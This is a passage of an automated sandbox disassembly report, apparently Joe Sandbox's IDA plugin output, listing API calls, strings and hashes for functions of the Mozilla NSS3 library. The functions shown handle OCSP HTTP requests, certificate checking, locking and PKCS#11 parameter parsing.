PR_ExitMonitor.NSS3 ref: 6C65EAC5

Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C71945B
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C719479
Part of subcall function 6C719440: EnterCriticalSection.KERNEL32 ref: 6C719495
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C7194E4
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C719532
Part of subcall function 6C719440: LeaveCriticalSection.KERNEL32 ref: 6C71955D

PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C65EBAF
PR_Socket.NSS3(00000002,00000001,00000000), ref: 6C65EBF8
PR_StringToNetAddr.NSS3(?,?), ref: 6C65EC20
PORT_Alloc_Util.NSS3(00000800), ref: 6C65EC39
PR_GetHostByName.NSS3(?,00000000,00000800,?), ref: 6C65EC5A
PR_EnumerateHostEnt.NSS3(00000000,?,?,?), ref: 6C65EC85
free.MOZGLUE(?), ref: 6C65ECB6
PR_SetError.NSS3(FFFFE078,00000000), ref: 6C65ECCF
free.MOZGLUE(?), ref: 6C65ED10
free.MOZGLUE(?), ref: 6C65ED26
PR_InitializeNetAddr.NSS3(00000000,?,?), ref: 6C65ED35
PR_snprintf.NSS3(?,00000010,:%d,?), ref: 6C65ED7F
PR_smprintf.NSS3(POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u,?,?,00000000,?), ref: 6C65EDAB
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C65EDBE
free.MOZGLUE(00000000), ref: 6C65EE9B
PR_smprintf.NSS3(GET %s HTTP/1.0Host: %s%s,?,?,00000000), ref: 6C65EEB1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C65EEC0
free.MOZGLUE(00000000), ref: 6C65EEE2
free.MOZGLUE(00000000), ref: 6C65EEF2
free.MOZGLUE(?), ref: 6C65EF15
free.MOZGLUE(?), ref: 6C65EF27
realloc.MOZGLUE(00000000,-00000401), ref: 6C65EF5C

Part of subcall function 6C65E910: PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C65E93B
Part of subcall function 6C65E910: PR_SetError.NSS3(FFFFE075,00000000), ref: 6C65E94E

strstr.VCRUNTIME140(-000000F8,), ref: 6C65F00C
strstr.VCRUNTIME140(00000000,6C7A010D), ref: 6C65F03F
strchr.VCRUNTIME140(00000000,00000020), ref: 6C65F055
PL_strncasecmp.NSS3(00000000,HTTP/,00000005), ref: 6C65F06D
free.MOZGLUE(00000000), ref: 6C65F07A
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C65F08A
strchr.VCRUNTIME140(?,00000020), ref: 6C65F0AC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,200), ref: 6C65F0C4
strchr.VCRUNTIME140(?,0000003A), ref: 6C65F0FA
strstr.VCRUNTIME140(-00000002,6C7A010D), ref: 6C65F124
PL_strcasecmp.NSS3(?,content-type), ref: 6C65F13D
PL_strcasecmp.NSS3(?,content-length), ref: 6C65F14F
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 6C65F15F
PL_strcasecmp.NSS3(?,application/ocsp-response), ref: 6C65F1A0
memcpy.VCRUNTIME140(00000000,?), ref: 6C65F1CD
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C65F231
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C65F387
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C65F39C
free.MOZGLUE(00000000), ref: 6C65F3A5
free.MOZGLUE(00000000), ref: 6C65F3B1

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

Strings

GET, xrefs: 6C65EB53
GET %s HTTP/1.0Host: %s%s, xrefs: 6C65EEAC
POST, xrefs: 6C65EB58, 6C65EB81
content-type, xrefs: 6C65F137
200, xrefs: 6C65F0BB
HTTP/, xrefs: 6C65F067
application/ocsp-request, xrefs: 6C65EE25
POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u, xrefs: 6C65EDA6
:%d, xrefs: 6C65ED73
application/ocsp-response, xrefs: 6C65F19A
http, xrefs: 6C65EB86
content-length, xrefs: 6C65F149

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$Value$Error$CriticalSection$EnterL_strcasecmpstrchrstrstr$AddrHostL_strncasecmpLeaveMonitorR_smprintfUtilmemcpystrlen$AllocAlloc_EnumerateExitInitializeItem_ModuleNamePageR_snprintfSizeSocketStringatoireallocstrcmp
String ID: 200$:%d$GET$GET %s HTTP/1.0Host: %s%s$HTTP/$POST$POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u$application/ocsp-request$application/ocsp-response$content-length$content-type$http
API String ID: 3957390022-1324771758
Opcode ID: 90ce8346630fa6d58185276708839344dac6819d9f359d29d04a64b205151529
Instruction ID: aad00575adfbecb254950a1fa3d47fbb7011bc9743fa6f7b62d255fff092d04c
Opcode Fuzzy Hash: 90ce8346630fa6d58185276708839344dac6819d9f359d29d04a64b205151529
Instruction Fuzzy Hash: C542E1B1609301AFEB009F64DC89B5B77E4AF45348F644838F94983B50E735D929CB9B

Function 6C65CA70 Relevance: 84.8, APIs: 56, Instructions: 849threadtimememoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C65CB45
PORT_ZAlloc_Util.NSS3(00000040), ref: 6C65CB5B
CERT_GetConstrainedCertificateNames.NSS3(?,00000010,?), ref: 6C65CBEB
realloc.MOZGLUE(?,00000000), ref: 6C65CC3B
PR_SetError.NSS3(FFFFE029,00000000), ref: 6C65CD25
PR_GetCurrentThread.NSS3 ref: 6C65CD35
CERT_FindCertIssuer.NSS3(?,00000001,?,00000001), ref: 6C65CD74
CERT_CheckCertValidTimes.NSS3(?,00000001,?,00000000), ref: 6C65CD9D
PR_GetCurrentThread.NSS3 ref: 6C65CDBA
PR_SetError.NSS3(FFFFE01E,00000000), ref: 6C65CDD2
PR_GetCurrentThread.NSS3 ref: 6C65CDE9
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C65CE7C
PR_GetCurrentThread.NSS3 ref: 6C65CE93
PR_SetError.NSS3(FFFFE025,00000000), ref: 6C65CEC1
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C65CF8F
memcmp.VCRUNTIME140(?,6C7796B4,00000048), ref: 6C65CFC8
PR_GetCurrentThread.NSS3 ref: 6C65D071
CERT_GetCertTrust.NSS3(?,?), ref: 6C65D091
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C65D0C6
PR_GetCurrentThread.NSS3 ref: 6C65D0DD
PR_SetError.NSS3(FFFFE05A,00000000), ref: 6C65D116
PR_GetCurrentThread.NSS3 ref: 6C65D131
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D1D9
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D225
CERT_DestroyCertificate.NSS3(?), ref: 6C65D410
PR_SetError.NSS3(FFFFE0B6,00000000), ref: 6C65D44E
PR_GetCurrentThread.NSS3 ref: 6C65D45E
PR_GetCurrentThread.NSS3 ref: 6C65D1EC

Part of subcall function 6C65C9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6C65D864,?,00000000,?), ref: 6C65C9AE

PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D285
PR_GetCurrentThread.NSS3 ref: 6C65D298
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D2D7
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D330
PR_GetCurrentThread.NSS3 ref: 6C65D34C
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C65D392
CERT_DestroyCertificate.NSS3(?), ref: 6C65D3BC
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6C65D3DF
PR_GetCurrentThread.NSS3 ref: 6C65D3EE
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C65CE12

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_GetCurrentThread.NSS3 ref: 6C65CE22
PR_GetCurrentThread.NSS3 ref: 6C65CED8
memcmp.VCRUNTIME140(?,6C7796FC,00000048), ref: 6C65CFDC
CERT_GetCertTimes.NSS3(?,?,?), ref: 6C65CFF6
PR_GetCurrentThread.NSS3 ref: 6C65CDFD

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

PR_GetCurrentThread.NSS3 ref: 6C65CE52
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D4C4
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D4E2
PR_GetCurrentThread.NSS3 ref: 6C65D4EA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65D515
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C65D52C
PR_GetCurrentThread.NSS3 ref: 6C65D540
free.MOZGLUE(?), ref: 6C65D567
CERT_DestroyCertificate.NSS3(00000000), ref: 6C65D575
CERT_DestroyCertificate.NSS3(?), ref: 6C65D584
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C65D592

Part of subcall function 6C6706A0: TlsGetValue.KERNEL32 ref: 6C6706C2
Part of subcall function 6C6706A0: EnterCriticalSection.KERNEL32(?), ref: 6C6706D6
Part of subcall function 6C6706A0: PR_Unlock.NSS3 ref: 6C6706EB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CurrentErrorThread$CertificateDestroyUtil$Cert$Value$Alloc_Arena_Timesmemcmp$ArenaCheckConstrainedCriticalEnterEqual_FindFreeIssuerItemsNamesPublicSectionTrustUnlockValidfreerealloc
String ID:
API String ID: 3754541784-0
Opcode ID: 3ae079a475c058c5751fd26028e2a1db58f35027616000d10e8f260699770a82
Instruction ID: 1de69443be53e299e360f3a656ad88044dad59ffec440b100ed75ceb81bc6838
Opcode Fuzzy Hash: 3ae079a475c058c5751fd26028e2a1db58f35027616000d10e8f260699770a82
Instruction Fuzzy Hash: 57522771A08301ABEB109F15CD40B5B77E1AFC530CFB44528F95697BA1E731E82ACB5A

Function 6C6A09B0 Relevance: 66.8, APIs: 44, Instructions: 817memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C6A1AD3), ref: 6C6A09D5
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C6A1AD3), ref: 6C6A09E9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6A0A18
PR_SetError.NSS3(00000000,00000000), ref: 6C6A0A30
memcpy.VCRUNTIME140(?,00000000,00000020,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6A0CC9
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6A0D05
EnterCriticalSection.KERNEL32(?), ref: 6C6A0D19
PR_Unlock.NSS3(?), ref: 6C6A0D36
free.MOZGLUE(?), ref: 6C6A0D75
TlsGetValue.KERNEL32 ref: 6C6A0DA1
EnterCriticalSection.KERNEL32(?), ref: 6C6A0DB5
PR_Unlock.NSS3(?), ref: 6C6A0DEB
PORT_Alloc_Util.NSS3(?), ref: 6C6A0DFF
PR_Unlock.NSS3(?), ref: 6C6A0E37
free.MOZGLUE(?), ref: 6C6A0E4E
PR_SetError.NSS3(00000000,00000000), ref: 6C6A0E6A
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6A0E9A
TlsGetValue.KERNEL32 ref: 6C6A0F23
EnterCriticalSection.KERNEL32(?), ref: 6C6A0F37
PR_SetError.NSS3(00000000,00000000), ref: 6C6A0FC7

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_Unlock.NSS3(?), ref: 6C6A0FDE
TlsGetValue.KERNEL32 ref: 6C6A0FFA
EnterCriticalSection.KERNEL32(?), ref: 6C6A100E
PR_Unlock.NSS3(?), ref: 6C6A1050
PR_Unlock.NSS3(?), ref: 6C6A1073
TlsGetValue.KERNEL32 ref: 6C6A1087
EnterCriticalSection.KERNEL32(?), ref: 6C6A109B
PR_Unlock.NSS3(?), ref: 6C6A10B8
free.MOZGLUE(?), ref: 6C6A1113
PORT_Alloc_Util.NSS3(?), ref: 6C6A1151
free.MOZGLUE(?), ref: 6C6A11AB
TlsGetValue.KERNEL32 ref: 6C6A1296
EnterCriticalSection.KERNEL32(?), ref: 6C6A12AB
PR_Unlock.NSS3(?), ref: 6C6A12D9
TlsGetValue.KERNEL32 ref: 6C6A12F4
EnterCriticalSection.KERNEL32(?), ref: 6C6A130C
PR_Unlock.NSS3(?), ref: 6C6A1340
TlsGetValue.KERNEL32 ref: 6C6A1354
EnterCriticalSection.KERNEL32(?), ref: 6C6A136C
PR_Unlock.NSS3(?), ref: 6C6A13A3
TlsGetValue.KERNEL32 ref: 6C6A13BA
EnterCriticalSection.KERNEL32(?), ref: 6C6A13CF
PR_Unlock.NSS3(?), ref: 6C6A13FB

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

PR_SetError.NSS3(FFFFE040,00000000), ref: 6C6A141E

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalSection$Enter$Errorfree$Alloc_Utilcalloc$Leavememcpymemset
String ID:
API String ID: 3136013483-0
Opcode ID: f9273d6eb09e20cbaf6a584b34b6273a021a45ec33f448ec0b6189c0cf92c948
Instruction ID: 6f92412d16c874c4cefc507e67d61c71f6f10f3d9e439a52d5e22bb7d4949392
Opcode Fuzzy Hash: f9273d6eb09e20cbaf6a584b34b6273a021a45ec33f448ec0b6189c0cf92c948
Instruction Fuzzy Hash: 7972C171D00254EFEB109FA4D888B997BB4BF05318F1801B9DC0A9B752E735EC86CB99

Function 6C6B4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C69601B,?,00000000,?), ref: 6C6B486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C6B48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C6B48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C6B48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C6B48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C6B490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C6B4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C6B493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4970
PORT_Alloc_Util.NSS3(00000001), ref: 6C6B49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6B49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C6B49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C6B4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C6B4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C6B4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C6B4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C6B4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C6B4A81
free.MOZGLUE(00000000), ref: 6C6B4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6B4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C6B4ADC
free.MOZGLUE(00000000), ref: 6C6B4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6B4B33

Part of subcall function 6C6B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B413D
Part of subcall function 6C6B4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6B4162
Part of subcall function 6C6B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B416B
Part of subcall function 6C6B4120: PL_strncasecmp.NSS3(2Bkl,?,00000001), ref: 6C6B4187
Part of subcall function 6C6B4120: NSSUTIL_ArgSkipParameter.NSS3(2Bkl), ref: 6C6B41A0
Part of subcall function 6C6B4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B41B4
Part of subcall function 6C6B4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C6B41CC
Part of subcall function 6C6B4120: NSSUTIL_ArgFetchValue.NSS3(2Bkl,?), ref: 6C6B4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C6B4B53
free.MOZGLUE(00000000), ref: 6C6B4B94
free.MOZGLUE(?), ref: 6C6B4BA7
free.MOZGLUE(00000000), ref: 6C6B4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4BC8

Strings

askpw, xrefs: 6C6B4A4A
hasRootCerts, xrefs: 6C6B4AD6
rootFlags, xrefs: 6C6B4AB9, 6C6B4B2E
every, xrefs: 6C6B4A66
slotFlags, xrefs: 6C6B4A22
timeout, xrefs: 6C6B4A38, 6C6B4A7B
hasRootTrust, xrefs: 6C6B4B4D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: ff93d36eb948850ef000714f4fe22bbf3cd1bbccf9ce43fb02e75c62736be072
Instruction ID: d0bf54ce02af0a4edab2978d1b809bc9bdec7a8af08ff2bd5fb77fdc971bf921
Opcode Fuzzy Hash: ff93d36eb948850ef000714f4fe22bbf3cd1bbccf9ce43fb02e75c62736be072
Instruction Fuzzy Hash: D8C11670E452559FEB009FA89C40BBE7BB8AF06308F180079ED55B7B01E7B1D924C7A9

Function 6C676D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C77A8EC,0000006C), ref: 6C676DC6
memcpy.VCRUNTIME140(?,6C77A958,0000006C), ref: 6C676DDB
memcpy.VCRUNTIME140(?,6C77A9C4,00000078), ref: 6C676DF1
memcpy.VCRUNTIME140(?,6C77AA3C,0000006C), ref: 6C676E06
memcpy.VCRUNTIME140(?,6C77AAA8,00000060), ref: 6C676E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C676E38

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C676E76
TlsGetValue.KERNEL32 ref: 6C67726F
EnterCriticalSection.KERNEL32(?), ref: 6C677283

Strings

!, xrefs: 6C677123

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: cbf9935b07b4f8437322e8285c271ebdc04b3272544acce4d2a0c77f58947c04
Instruction ID: a0762196239a323abfd35addf185e031389bad86fbd11ab7c43b1b5a9c4769e8
Opcode Fuzzy Hash: cbf9935b07b4f8437322e8285c271ebdc04b3272544acce4d2a0c77f58947c04
Instruction Fuzzy Hash: 7B729E75D052199FDF21CF28CC8879ABBB5EB49304F1445A9E80CA7701EB31AA85CFA5

Function 6C698A30 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C698A58

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C698AC6
PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6C698ADF
SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6C698B19
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C698B2D
PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6C698B49
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6C698B61
SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6C698B83
SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6C698BA0
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C698BF0
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C698BF9
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C698C13
HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C698C3A
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C698CA7
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C698CC4
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C698D12
PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C698D20
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C698D40
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C698D99
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C698DBF
PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6C698DD5
SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6C77D864), ref: 6C698E39

Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6AF0C8
Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6AF122

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6C698E5B

Part of subcall function 6C6ABE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C65E708,00000000,00000000,00000004,00000000), ref: 6C6ABE6A
Part of subcall function 6C6ABE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6604DC,?), ref: 6C6ABE7E
Part of subcall function 6C6ABE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C6ABEC2

SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C77D8C4), ref: 6C698E94
SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6C698EAC
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C698EBA
SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6C698ECC
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C698EE1
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C698EF4
